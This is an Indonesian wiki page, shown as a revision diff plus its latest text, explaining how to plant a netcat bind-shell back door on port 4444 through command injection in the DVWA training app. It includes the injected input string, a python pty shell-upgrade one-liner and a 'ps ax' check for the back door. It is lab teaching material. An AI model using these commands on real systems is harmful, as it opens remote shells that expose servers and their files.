Difference between revisions of "DVWA: Command Injection Back Door"

From OnnoWiki
Jump to navigation Jump to search
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
Backdoor menggunakan perintah
+
Backdoor pada port 4444 menggunakan perintah
  
  fifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
+
  mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
  
 
Dari command injection di DVWA masukan
 
Dari command injection di DVWA masukan
Line 15: Line 15:
 
  cat <namafile>
 
  cat <namafile>
 
  dsb
 
  dsb
 +
 +
==Ujicoba==
  
 
Percobaan untuk memperoleh shell  
 
Percobaan untuk memperoleh shell  
  
 
  python -c 'import pty; pty.spawn("/bin/sh")'
 
  python -c 'import pty; pty.spawn("/bin/sh")'
 +
 +
 +
==Cek Operasional Back Door==
 +
 +
Di sisi server, dapat mencek adanya back door dengan
 +
 +
ps ax
 +
 +
nanti akan kelihatan mkfifo dkk
 +
 +
==Pranala Menarik==
 +
 +
* [[DVWA]]
 +
* [[mkfifo]]

Latest revision as of 14:33, 30 August 2024

Backdoor pada port 4444 menggunakan perintah

mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

Dari command injection di DVWA masukan

192.168.43.1;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

dimana 192.168.43.1 adalah salah satu IP mesin di jaringan

Selanjutnya kita bisa memasukan perintah2 shell seperti

ls
cd /etc
cat <namafile>
dsb

Ujicoba

Percobaan untuk memperoleh shell

python -c 'import pty; pty.spawn("/bin/sh")'


Cek Operasional Back Door

Di sisi server, dapat mencek adanya back door dengan

ps ax

nanti akan kelihatan mkfifo dkk

Pranala Menarik